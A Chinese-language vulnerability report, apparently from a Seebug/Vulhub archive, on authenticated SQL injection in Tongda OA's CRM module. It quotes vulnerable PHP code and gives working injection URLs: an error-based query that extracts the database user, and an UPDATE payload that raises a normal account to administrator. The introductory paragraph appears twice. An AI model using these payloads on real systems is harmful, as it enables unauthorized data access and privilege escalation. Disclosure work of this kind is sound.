VULHUB ™

### 简要描述： 通达OA SQL注射漏洞，需登录。 ### 详细说明： 程序是集成化安装，在php.ini中register_globals设置为on，允许注册全局变量。 在/general/crm/apps/crm/include/deleteView.php文件中$id变量未初始化： ``` include_once( "general/crm/studio/header.php" ); include_once( "inc/utility.php" ); $flag = 0; $query = "delete from crm_sys_list_view where id=".$id; $cursor = exequery( $connection, $query ); ``` 测试语句如下： ``` http://oa.tongda2000.com:81/general/crm/apps/crm/include/deleteView.php?id=1 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 ``` [<img src="https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png) 在/general/crm/apps/crm/include/delete_submit.php中 ``` ob_end_clean( ); $ATTACHMENT_ID = $_POST['ATTACH_ID']; $ATTACHMENT_NAME = $_POST['ATTACH_NAME']; $ENTITY_NAME =...

### 简要描述： 通达OA SQL注射漏洞，需登录。 ### 详细说明： 程序是集成化安装，在php.ini中register_globals设置为on，允许注册全局变量。 在/general/crm/apps/crm/include/deleteView.php文件中$id变量未初始化： ``` include_once( "general/crm/studio/header.php" ); include_once( "inc/utility.php" ); $flag = 0; $query = "delete from crm_sys_list_view where id=".$id; $cursor = exequery( $connection, $query ); ``` 测试语句如下： ``` http://oa.tongda2000.com:81/general/crm/apps/crm/include/deleteView.php?id=1 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 ``` [<img src="https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png) 在/general/crm/apps/crm/include/delete_submit.php中 ``` ob_end_clean( ); $ATTACHMENT_ID = $_POST['ATTACH_ID']; $ATTACHMENT_NAME = $_POST['ATTACH_NAME']; $ENTITY_NAME = $_POST['ENTITY_NAME']; $FIELD_NAME = $_POST['FIELD_NAME']; $KEY_ID = $_POST['KEY_ID']; $ATTACH_TYPE = $_POST['ATTACH_TYPE']; $query = "select ".$FIELD_NAME.",".$FIELD_NAME."_text from ".$ENTITY_NAME." where id ='".$KEY_ID."'"; $cursor = exequery( $connection, $query ); ``` $ENTITY_NAME、$FIELD_NAME、$ENTITY_NAME都未进行过滤可以注射SQL语句。 [<img src="https://images.seebug.org/upload/201310/28171517b7e208bf153b06e7deefc073443940fc.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/28171517b7e208bf153b06e7deefc073443940fc.png) 在/general/crm/modules/Account/account/DeleteView/index.php文件中： ``` include_once( "general/crm/apps/crm/header.php" ); $entity = $_GET['entity']; $ids = $_GET['ids']; $query = "update ".$entity." set ".$entity.( ".deleted = 1 where find_in_set(id, '".$ids."')" ); $cursor = exequery( $connection, $query ); ``` $entity变量未初始化，导致能够更新数据库内的任意表，这里使用的是一般权限账号chr登录。 [<img src="https://images.seebug.org/upload/201310/281722412556b0036e930ad3a3e826a70e967b05.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/281722412556b0036e930ad3a3e826a70e967b05.png) 下面将chr update为管理员权限。 ``` http://oa.tongda2000.com:81/general/crm/modules/Account/account/DeleteView/index.php?entity=user set USER_PRIV=1 where user_id=0x636872%23 ``` [<img src="https://images.seebug.org/upload/201310/28173128b6d3327da1ae8cb1a6bb2c888ae63c72.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/28173128b6d3327da1ae8cb1a6bb2c888ae63c72.png) ### 漏洞证明： 同上